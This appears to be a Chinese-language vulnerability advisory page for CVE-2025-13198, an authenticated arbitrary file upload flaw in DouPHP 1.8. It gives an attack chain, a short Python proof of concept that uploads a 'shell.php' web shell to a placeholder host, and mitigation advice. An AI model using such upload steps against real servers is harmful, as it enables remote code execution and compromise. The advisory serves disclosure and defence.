CVE-2025-13198 CVSS 4.7 中危

DouPHP 1.8 任意文件上传漏洞 (CVE-2025-13198)

披露日期: 2025-11-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13198

漏洞类型

无限制文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

DouPHP

漏洞概述

DouPHP 1.8版本中存在一个严重的安全漏洞，攻击者可以利用此漏洞在受影响的系统上执行任意代码。漏洞源于upload/include/file.class.php文件中的上传功能缺乏充分的文件类型验证和内容检查。攻击者通过构造恶意文件并上传到服务器，可以实现远程代码执行，对系统造成严重威胁。

技术细节

漏洞存在于DouPHP的上传模块中，upload/include/file.class.php文件未对上传文件进行充分的验证。攻击者可以通过修改文件扩展名或使用多语言脚本（如PHP）来绕过基本的安全检查。成功利用此漏洞需要认证用户权限，攻击者可上传包含恶意代码的文件并在服务器上执行。

攻击链分析

STEP 1

识别目标系统运行DouPHP

STEP 2

获取认证用户权限

STEP 3

构造包含恶意PHP代码的文件

STEP 4

通过upload/include/file.class.php上传文件

STEP 5

访问上传的文件以执行恶意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import os

target = 'http://target.com/doup/php'
file_path = 'shell.php'

with open(file_path, 'rb') as f:
    files = {'file': (file_path, f, 'application/octet-stream')}
    response = requests.post(f'{target}/upload', files=files)
    print(response.text)

影响范围

DouPHP <= 1.8 Release 20251022

防御指南

临时缓解措施

立即限制上传目录的脚本执行权限，审查现有上传功能，部署WAF规则拦截恶意文件上传请求

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13198
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13198
3 Details https://www.cvedetails.com/cve/CVE-2025-13198/
4 VulDB https://vuldb.com/cve/CVE-2025-13198
5 Link https://github.com/electroN1chahaha/My-CVE/issues/1
6 Link https://vuldb.com/?ctiid.332496
7 Link https://vuldb.com/?id.332496
8 Link https://vuldb.com/?submit.685544

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表